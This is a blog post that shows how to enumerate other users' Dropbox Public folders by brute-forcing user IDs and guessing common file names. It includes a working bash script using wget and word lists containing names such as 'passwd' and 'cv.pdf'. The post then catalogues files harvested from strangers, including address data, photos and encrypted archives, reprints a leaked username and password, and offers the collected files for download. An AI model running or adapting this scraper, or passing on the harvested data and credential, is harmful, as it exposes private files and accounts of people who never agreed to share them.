Forwardfeed's blog

Jak publiczne są dane w katalogu Public, który jest udostępniany przez Dropbox. Okazuje się, że leży tam wiele danych i powinny one być raczej chronione. Jak się do nich dostać?

Dropbox udostępnia folder Public, który jest wykorzystywany do łatwego dzielenia się zasobami z innymi osobami, które na przykład niekoniecznie chcą mieć Dropboxa. Po załadowaniu pliku do naszego katalogu uzyskujemy public link, który można komuś przekazać. Dzięki niemu osoba, która go otrzymała ściągnie z naszego komputera/konta interesujący ją plik.

Jednak niekoniecznie chcemy aby nasze słitaśne fotki były dostępne dla wszystkich, dlatego też nie można wylistować folderu Public danej osoby. Nasza wiedza sprowadza się do tego, że wiemy, że w katalogu http://dl.dropbox.com/u/USER_ID/ znajdują się jakieś pliki. Nie wiemy czy jest tam plik moja_slitasna_fota.jpg, nie mamy żadnych informacji co tam może się znajdować.

Zadanie analogiczne – przed nami wielkie osiedle na którym szukamy osoby o imieniu Krzysztof. Kilku Krzysztofów na osiedlu musi być! ale jednak, żadna rodzina się nie chwali, że mieszka z nimi Krzysztof (no chyba, że chcą komuś o tym powiedzieć – nam nie). Jak odnaleźć Krzysztofów? Idziemy i dzwonimy domofonem od klatki do klatki z pytaniem: “Czy zastałem Krzysztofa?”. Odpowiedź: “pomyłka”, “tu Krzysztof nie mieszka” oznacza, że tutaj nie znajdziemy poszukiwanego. Jednak jeśli uzyskamy odpowiedź: “jest”, “wyszedł po piwo”, to wiemy, że tu Krzysztof pomieszkuje i możemy na niego poczekać lub zabrać go w ciekawe miejsce ;).

Dzwonimy domofonem – przeglądamy każdy folder postaci http://dl.dropbox.com/u/1/ … http://dl.dropbox.com/u/60000/ i pytamy się czy jest tam słitaśna fotka: me.jpg. W pierwszym nie ma, w drugim też nie, itd, jednak na 60 000 zapytań znajdujemy 49 Krzysztofów słitaśnych fot w formacie me.jpg.

Podobnie dla domniemanych nazw cv.pdf, test.txt, index.html, etc można znaleźć inne pliki. Poniżej skrypt, który to potrafi wykonać i mały opis dla kilku osób w złym języku. Widać, że jest wiele stron postawionych w katalogu Public, jednak część osób nie zdaje sobie sprawy, że praktycznie udostępnia swoje dane.

#!/bin/bash
#Krzysztof Dziadziak
 
#sprawdzmy, czy podano argumenty
#checking if arguments exists
if [ $# = 0 ] ; then
  #jesli nie ma argumentow to uruchom potomka z parametrem
  #if not then run script with argument
 
  #lista nazw plikow, ktore chcemy sprawdzic
  #list of files names, which we want to check
  types="`cat types.txt`" 
 
  #dla kazdego typu z pliku types.txt
  #for each typ described in types.txt
  for typ in $types
  do
    sh `./DB_scan2.sh "$typ"` &
	#uruchom w tle
	#run in background
  done
 
else
  #argument - poszukiwana nazwa plikow
  #argument as searching file name
 
  #sprawdz numery userow
  #check users IDs
  for i in {30001..60000}
  do
 
	#pobierz plik w trybie quite, probuj 2 razy
	#get file in quiet mode, max tries only twice if smth goes wrong
	wget -q --tries=2 --timeout=30 --limit-rate=20k http://dl.dropbox.com/u/$i/"$1"
 
	#sciagnelismy jakis plik? jesli tak zmienmy mu nazwe na numer_usera_nazwa_pliku
	#did we get some file? if yes, change it name into user_ID_file_name
	if [ -f "$1" ]
	then
	  mv $1 "$i"_"$1"
	fi
 
  done
 
fi

Types used for accounts 1-10 000 (each type in types.txt should me ended with new line sign; each type in separate line)


New%20Microsoft%20Office%20Word%20Document.docx New%20bmp.bmp New%20txt.txt New%20Wave%20Sound.wav New%20Microsoft%20Office%20PowerPoint%20Presentation.pptx New%20Microsoft%20Office%20Excel%20Worksheet.xlsx me.jpg we.jpg I.jpg my.jpg she.jpg my.txt me.txt me.bmp my.zip test.txt 1.zip file.zip test.zip index.html f.avi dok1.doc passwd 1.mp3 2.mp3 cv.pdf autorun.inf new%20file


Types used for accounts 10001-60 000 (using the same as above)


me.jpg we.jpg 666 temp 1111.txt 111.txt temp.txt file.rar 1.rar I.jpg my.jpg me1.jpg she.jpg my.txt me.txt me.bmp my.zip test.txt 1.zip file.zip test.zip index.html f.avi dok1.doc passwd 1.mp3 2.mp3 cv.pdf autorun.inf


- a lot of “this is a test/Dette er en test!/To je test./Das ist ein Test”, “hello world”, “test”, “this is a Dropbox…”, etc
- parts of html code
- empty files
- “Yo, if you can read this note – send me an e-mail and let me know.”
- address data
- some lyrics
- “http://udeter:bowd2776@members.bangbrosnetwork.com/” doesn’t work :(
- states of some RPG game (?)
- links/to_do list/tests/logs/playlists
- “KvHp\8D1HwK\Hz9n+fENx\oJ8SOTzPD90Vx5c/5uwOm4DuqAP\XC!BV,euQS9ea” What it can be?

- archiwum with folder _MACOSX (three archives), file 1.psd What is that?
- AutoCAD key generator
- Some site with fvl/swf files
- Instaler and files of Clean Utility
- Work folder of Subtitle – some STEP folders
- Encrypted setup.exe RAR – mayby someone want to try recover it
- Some source of python
- EPLite Map Reveal
- FileZilla Portable
- Huge encrypted file with encrypted header RAR The same as above
- Photos from party in New York state I supposed
- A lot of screens from UTcomp
- WHOLE folder of Firefox
- scaned pages from polish textbook of history

- 2 of techno/club
- 2 some of guitar – josh :/
- 2 with accordion [sic!]
- 1 of idontknow
- 1 of Sun Tornado
- 2 parts of 7 seconds of I Don’t Want To Miss A Thing – Aerosmith

- AutoRun\Linksys.ico
- VolumeIcon.ico
- AutoPlay\Resdata\cs4_designstan_disc.ico
- StartPortableApps.exe

- screen of site
- photo of eyes
- 4chan /I/ picture :]
- cover of CD audio (?)

This script scans public folders on Dropbox one by one and looks for files of type listed in types.txt. Above you can find number of found files, probability of hit and sometimes short description of them. All data from CVs has been removed. All files including script/types.txt, without cv.pdf and big files you can download here. Yeah ;) 1.zip. Direct links to big files on demand.

Do you like it? Share it!

Popularity: 100%